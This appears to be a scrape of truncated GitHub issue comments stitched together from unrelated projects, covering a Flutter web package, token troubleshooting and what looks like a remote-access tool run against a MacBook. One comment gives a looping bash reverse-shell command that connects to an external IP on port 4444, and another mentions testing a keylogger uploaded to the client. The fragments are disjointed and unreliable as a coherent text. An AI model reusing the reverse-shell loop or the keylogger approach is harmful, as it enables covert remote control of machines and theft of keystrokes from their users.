Hello, do you have further information about your issue? A trace log? Are you sure that your token is correct? Thank you.
Hello @d-apps Flutter web was in beta when this package was created so I haven’t tested it. It should theoretically works but, maybe, there would be some CORS problems with...
For info the client is a Macbook Pro 2008 running probably last osx version
I used this script : while true;do bash -i >& /dev/tcp/(external IP)/4444 0>&1;sleep 5;done I configured it to works over lan with my external ip. But yes it's probably a...
ok thank you. Problem resolved but now i have this error. I put you an example. test@test's MacBook> ls total 18 4983 384 2017-03-29 16:51:18 test .bash_history 7 256 2015-11-28...
Looks like the same error i got with ls
I have exactly the same issue
Personally i tested this keylogger which works fine, but it's written in Switch which means that you need to upload the executable to the client.
> Nice! Thank you! The code looks nice and clean. > > We'll need some tests though! To ensure the functionality works and that there are no regressions in future....
Hello sorry for delay. I will soon update the code and instructions. I never tried to host it on repl.iy. I will check it and update this issue. Thank you.